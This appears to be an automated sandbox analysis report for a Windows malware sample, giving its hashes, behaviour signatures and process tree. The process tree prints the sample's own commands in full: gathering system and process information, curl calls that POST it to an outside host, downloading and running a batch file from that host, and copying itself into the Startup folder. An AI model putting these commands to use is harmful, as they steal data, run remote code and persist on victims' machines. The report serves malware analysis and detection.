Analysis
-
max time kernel
95s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
15-12-2024 10:31
Static task
static1
Behavioral task
behavioral1
Sample
5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe
Resource
win10v2004-20241007-en
General
-
Target
5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe
-
Size
898KB
-
MD5
5950611ed70f90b758610609e2aee8e6
-
SHA1
798588341c108850c79da309be33495faf2f3246
-
SHA256
5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4
-
SHA512
7e51c458a9a2440c778361eb19f0c13ea4de75b2cf54a5828f6230419fbf52c4702be4f0784e7984367d67fabf038018e264e030e4a4c7dac7ba93e5c1395b80
-
SSDEEP
12288:UqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgapT1:UqDEvCTbMWu7rQYlBQcBiT6rprG8at1
Malware Config
Signatures
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe cmd.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 468 tasklist.exe -
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language systeminfo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2272 systeminfo.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 468 tasklist.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 3832 wrote to memory of 2560 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 82 PID 3832 wrote to memory of 2560 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 82 PID 3832 wrote to memory of 2560 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 82 PID 2560 wrote to memory of 2272 2560 cmd.exe 84 PID 2560 wrote to memory of 2272 2560 cmd.exe 84 PID 2560 wrote to memory of 2272 2560 cmd.exe 84 PID 2560 wrote to memory of 468 2560 cmd.exe 87 PID 2560 wrote to memory of 468 2560 cmd.exe 87 PID 2560 wrote to memory of 468 2560 cmd.exe 87 PID 3832 wrote to memory of 740 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 88 PID 3832 wrote to memory of 740 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 88 PID 3832 wrote to memory of 740 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 88 PID 3832 wrote to memory of 1440 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 90 PID 3832 wrote to memory of 1440 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 90 PID 3832 wrote to memory of 1440 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 90 PID 3832 wrote to memory of 692 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 92 PID 3832 wrote to memory of 692 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 92 PID 3832 wrote to memory of 692 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 92 PID 3832 wrote to memory of 5000 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 93 PID 3832 wrote to memory of 5000 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 93 PID 3832 wrote to memory of 5000 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 93 PID 3832 wrote to memory of 4532 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 96 PID 3832 wrote to memory of 4532 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 96 PID 3832 wrote to memory of 4532 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 96 PID 3832 wrote to memory of 1716 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 98 PID 3832 wrote to memory of 1716 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 98 PID 3832 wrote to memory of 1716 3832 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe"C:\Users\Admin\AppData\Local\Temp\5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3832 -
C:\Windows\SysWOW64\cmd.execmd /c systeminfo > tmp.txt && tasklist >> tmp.txt2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\SysWOW64\systeminfo.exesysteminfo3⤵
- System Location Discovery: System Language Discovery
- Gathers system information
PID:2272
-
-
C:\Windows\SysWOW64\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:468
-
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C353237306334633638383162376433656261656138663531633431306262613836383961636236376333346632303434303532376135663135663362633165342E657865" -X POST -H "X-Auth: 2F5951524C4B594F4E2F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"2⤵
- System Location Discovery: System Language Discovery
PID:740
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C353237306334633638383162376433656261656138663531633431306262613836383961636236376333346632303434303532376135663135663362633165342E657865" -H "X-Auth: 2F5951524C4B594F4E2F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"2⤵
- System Location Discovery: System Language Discovery
PID:1440
-
-
C:\Windows\SysWOW64\cmd.execmd /c type "C:\Users\Admin\AppData\Local\Temp\5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe"2⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:692
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C353237306334633638383162376433656261656138663531633431306262613836383961636236376333346632303434303532376135663135663362633165342E657865" -H "X-Auth: 2F5951524C4B594F4E2F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"2⤵
- System Location Discovery: System Language Discovery
PID:5000
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt2⤵
- System Location Discovery: System Language Discovery
PID:4532
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C353237306334633638383162376433656261656138663531633431306262613836383961636236376333346632303434303532376135663135663362633165342E657865" -X POST -H "X-Auth: 2F5951524C4B594F4E2F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"2⤵
- System Location Discovery: System Language Discovery
PID:1716
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2B
MD581051bcc2cf1bedf378224b0a93e2877
SHA1ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA2567eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA5121b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d
-
Filesize
34B
MD5557464a645cbcc72fb20348e1c58dbfd
SHA12a68b1e4c9cca06c959a3174058a27da0faddadd
SHA2562fb99e1172ec47d7d0a943294a483e9c695d774ad9eca0c689eb0e4ad4982c66
SHA512728fba91e931258ed5ad1ff48299193384c0053770e05c0f813e8407dd328454c2c233da52ea67eb5aaf1c523a8d0e5de5a30b9bc94186e62c204b26df23123e
-
Filesize
8KB
MD550dac3eee0086560560325766739c778
SHA127a3f3e28656b60c42cdcdaed7a094be8d03d721
SHA25604a2498525b718fb6c34d5c87eabb8240eac460d2510422c9ea3887582607a3c
SHA512d973e3724fbe5dd0388da99960811d4e5a75f3b3de43096dd2ab1fa874abb0f0e4425323dff7defa68e4a4153ec8fecf373f9c2634498468b8c888e6d95647a5